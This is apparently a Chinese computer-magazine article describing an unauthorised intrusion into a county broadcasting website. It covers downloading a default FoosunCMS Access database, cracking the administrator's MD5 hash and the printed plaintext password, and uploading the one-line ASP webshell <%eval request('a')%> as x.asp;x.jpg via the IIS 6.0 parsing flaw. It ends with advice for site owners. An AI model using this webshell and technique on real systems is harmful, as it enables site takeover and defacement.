小漏洞大危害

来源 :电脑爱好者 | 被引量 : 0次 | 上传用户:fatcat120
下载到本地 , 更方便阅读
声明 : 本文档内容版权归属内容提供方 , 如果您对本文有版权争议 , 可与客服联系进行内容授权或下架
论文部分内容阅读
  最近关于网站新闻的故事很多,昨天刚看到某领导为视察“悬浮照”辩解,今天又能看到某“临时工”在网站发布了错误新闻。难道情况真的如此?我们经常能看到有人通过网站漏洞破解了登录密码,登录后制造恶作剧,那他们是怎样做到的?网站漏洞又是怎样被发现的呢?
  
  对于采用Access数据库的网站来说,如果存在数据库下载漏洞,会给网站的安全性造成极大的危害,可以说是小漏洞大危害。下面就用我亲身经历的一个案例来展示数据库下载漏洞的危害。
  一次在访问一个县的广电系统的门户网站时,出于习惯,顺手在网站地址后面加了个admin/,出现了“This Virtual Directory does not allow contents to be listed.”的错误提示,如图1。
  
  通过数据库获取密码
  看来存在admin目录。admin目录一般是网站的后台目录,看到存在admin目录,就决定看看网站的安全性如何。虽然知道了可能的后台目录,却还不知道后台登录页面的文件名,来试试常见的后台登录文件的名字,首先尝试admin_login.asp,提示“系统找不到指定的文件”,看来后台文件不是admin_login.asp,再尝试login.asp,这次出来了后台登录页面,如图2。
  通过后台登录页面上的文字知道网站采用的程序是FoosunCMS 4.0。尝试了几个比如用户名admin密码admin等弱口令都不对。这时候想到了网站用的是FoosunCMS 4.0,到网上下载FoosunCMS 4.0的源代码,然后在源代码中看能不能找到可以利用的地方。在中国站长站下载到了FoosunCMS网站内容管理系统 v4.0 sp7的源代码,解压下载回来的文件后发现FoosunCMS网站内容管理系统 v4.0 sp7采用的是Access数据库,默认存放数据库文件的目录为Foosun_Data,存放管理员信息的数据库的默认名字为FS400.mdb,如图3。
  看这个网站的数据库文件是不是还是默认的目录默认的文件名,在网站地址后面加上Foosun_Data/FS400.mdb,出现了下载文件的对话框! 如图4。
  很幸运,目标网站没有更改存放数据库文件的默认目录也没有更改数据库文件的名字,导致我下载到了网站的数据库文件。用Microsoft Office Access 2003打开下载回来的数据库文件,在表FS_MF_Admin中发现了管理员的用户名admin和密码db7636b853b11fce,如图5。
  
  破解密码登录后台
  密码到在线破解网站http://www.cmd5.com/default.aspx进行破解,显示“已查到,这是一条付费记录,密文类型:md5。”,查到了,但需要付费用户登录后才能查看结果,找了个有付费用户的朋友帮忙,得到密码zaijian$alang。
  用得到的管理员的用户名和密码进入了后台,如图6。
  在后台首页看到WEB服务器软件用的是Microsoft-IIS/6.0。在后台看能得到webshell不。在“新闻管理”下点击“添加新闻”来到了添加新闻的页面,点“插入/编辑图像”按钮,然后在出来的“图形属性”对话框中点“浏览服务器”按钮就来到了如图7的上传图片的地方。把ASP木马服务端代码<%eval request("a")%>保存为文件x.asp;x.jpg。点图7中的“上传”按钮,在“文件1”中通过“浏览”按钮选择x.asp;x.jpg,一定要保证自动命名的选项为“不自动命名”,点“确定”按钮后文件x.asp;x.jpg上传到了服务器上,而且上传上去后的文件名还为x.asp;x.jpg,如图8。
  文件x.asp;x.jpg上传到了Files目录下,访问地址为http://www.xxx.net/Files/x.asp;x.jpg。shell的地址就是http://www.xxx.net/Files/x.asp;x.jpg。可能有人会问.jpg文件怎么会是shell文件呢?Microsoft-IIS/6.0有一个解析漏洞,会把x.asp;x.jpg当成ASP文件来解析,网站WEB服务器软件用的是Microsoft-IIS/6.0,正好可以利用解析漏洞。用lake2的eval最小马发送端连接shell的地址http://www.xxx.net/Files/x.asp;x.jpg,写上密码a,发现shell的功能正常,如图9。
  
  获得网站控制权
  得到这个shell就获得了对网站文件的完全控制权,利用shell可以上传文件到网站,可以编辑网站下的所有文件,当然也可以删除网站目录下的任何文件。至此一个小型门户网站的安全性荡然无存,如果我在网页文件中插入挂马代码进行挂马,后果更是不堪设想。好在我只是看下网站的安全性,很快删除了shell文件,没有对网站目录下的任何文件进行修改或删除。
  这个数据库下载漏洞只要还存在,就有可能被别人也利用这个漏洞得到网站的shell,至于后来者会不会做出危害网站的事情,谁也不敢保证。只要这个漏洞还存在,网站的安全就面临着一个随时可能爆炸的炸弹。
  数据库下载漏洞是一个低级的小漏洞,但它的危害性却是巨大的。一旦这个漏洞被人利用,轻则一个网站彻底沦陷,重则网站所在的服务器沦陷,更甚者,一个服务器集群都可能因这个小漏洞而沦陷。
  其实,数据库下载漏洞很好修补,把默认的数据库文件的名字改成一个比较复杂的名字就可以了。修改网页的版权信息,不让入侵者知道你网站用的是什么程序进而不知道到哪里找默认数据库文件的名字也是一个不错的防范数据库下载漏洞的方法,不过最彻底的方法还是修改数据库文件默认的名字。
  希望各位站长朋友尤其是网站程序有.mdb数据库的朋友注意防范数据库下载漏洞。
其他文献
无论是出差还是探亲、旅游,都免不了带上照片、视频等文件,U盘、相机、MP3播放器都能胜任,但这些东西可能损坏也可能丢失。所以,我们还可以选择放到网上,无论身在何处,都可以通过网络随时下载回来。网络在线存储,不仅解决了这一问题,还可轻松地实现多人共享。目前,提供网络在线存储(也叫网络硬盘,以下简称为网盘)的网站比较多,那么,究竟哪一网盘更适合你呢?我们将对较流行的几款网盘进行测评以供大家参考。   
期刊
【摘 要】本文从发展土木工程信息化途径、土木工程信息化发展的关键、土木工程信息化面临的实际问题、土木工程信息化实施构架、土木工程信息化实施构架、土木工程信息化的安全控制、未来的土木工程发展方向这几方面进行了论述。  【关键词】土木工程;信息化管理;低碳;环保  前言:  信息通过计算机自动控制、通信和共享信息的处理的高科技成果转化和改进传统的工程技术和土木工程信息化建设工程导致土木工程专业商业管理
期刊
同事小马由于太忙,电脑上的文件经常随手乱存放着,当有空再来整理时,需要在各个不同分区和文件夹下面移动文件或者文件夹,如果用Windows系统的资源管理器,每次只能打开一个目录,来回在不同分区和目录中切换,非常麻烦,只好把Q-Dir这个秘密武器告诉他, 这是一款加强版的资源管理器,它在同一个界面里最多可以打开四个窗口,每个窗口都可以方便的切换目录,各窗口之间可以方便的移动文件和文件夹,特别适用于频繁
期刊
【摘 要】建筑工程项目管理的风险管理是一项系统性、长期性工程,在了解建筑工程质量管理风险的基础上做好各种应对策略,强化风险意识,建立健全风险管理机制,完善风险信息防范系统进,将整个工程管理的风险降到最低程度,不断提高管理水平,保证建筑企业快速健康稳定发展。基于此,本文着重分析建筑工程项目管理的风险及对策。  【关键词】建筑工程;项目管理;对策  1、建筑工程项目管理的重要作用  1.1、促进人员专
期刊
【摘 要】加强混凝土施工技术是我国土木工程施工管理中的重要一环,尤其是在建筑业水平高速发展的新时期里,混凝土技术显得尤为重要。只有更好的对混凝土施工技术进行把控,才能保证混凝土的施工质量,提升工程施工的安全性和经济性。本文论述了土木工程混凝土施工技术。  【关键词】土木工程;混凝土;施工技术  混凝土是土木工程施工中不可缺少的材料之一,混凝土价格相对低廉但各项性能都较为优良,工程建筑物主要靠混凝土
期刊
【摘 要】本文结合多年来的工作经验,主要对当前我国环境工程建设当中的难点问题进行了分析,提出了一些解决城市环境工程建设难点的应对措施。  【关键词】城市环境;工程建设;难点措施  前言:  环境工程建设是一项综合性较强的工作,不仅与人们日常生活联系紧密,还对经济社会发展产生一定影响。但由于受到资金、制度等因素制约,当前环境工程建设中仍然存在不足之处,对提高环境质量也产生不利影响。为此,必须采取有效
期刊
笔者所在学校每次组织考试,都需要将同一年级的学生按上次考试成绩排考场。要求安排考生所在考场和座号,每个考场30人,在编排时需要分好差试场,保证成绩在同一档次的学生尽可能安排到同一考场,还要求考场中前后相邻考生不同班。并要求安排监考教师,要求回避自己所任课程考试科目。这些手工完成比较麻烦,那就来使用“考场编排小秘书”快速搞定吧,它是使用Excel VBA编写开发的Excel文件,支持Excel各种版
期刊
【摘 要】随着我国现代城市化建设的进程不断加快,国家面临着严重的能源、资源缺乏问题,且生态环境污染日益严重。为缓解这一局面,城市化建设要以节能减排为基础,尤其是建筑土建工程也要以节能为基础。而建筑行业作为推动我国经济发展的重要力量,其能源资源消耗量最大,造成的生态环境污染也较为严重。因此,研究节能施工技术在建筑土建工程中的具体应用有着重要的意义。本文从节能施工技术和建筑土建工程的相关概念入手,阐述
期刊
去年的毕业论文答辩会,给我的一位高年级毕业班老乡留下一点小小的遗憾。她本来是在自己电脑上设计得好好的一份文档,通过答辩会场的电脑送到荧幕上时却变了样,显示效果大打折扣。事后老乡告诉我,是因为她使用了两种自认为很美的特殊字体,而现场的电脑中正好没有这两种字体才造成了这种遗憾的结局。老乡让我一定吸取经验教训。那么,难道必须在目标电脑中也安装自己设计所用的那些特殊字体,才能正确显示不成?    就拿Wo
期刊
【摘 要】起重机在核电站建设及运营过程中起着十分重要的作用,本文在浅述了起重机的机构及其安装施工过程。  【关键词】核电站;起重机;施工管理  1.引言:  起重机在核电站建设及运行期间起着非常关键的作用,核电站起重机分布在核岛、常规岛及BOP区域各厂房内。分布广,形式多样,吨位跨度大。主要类型包括:环形起重机、门式起重机、桥式起重机、单轨吊等,额定载荷从3t-1000t不等。  起重机可用一般是
期刊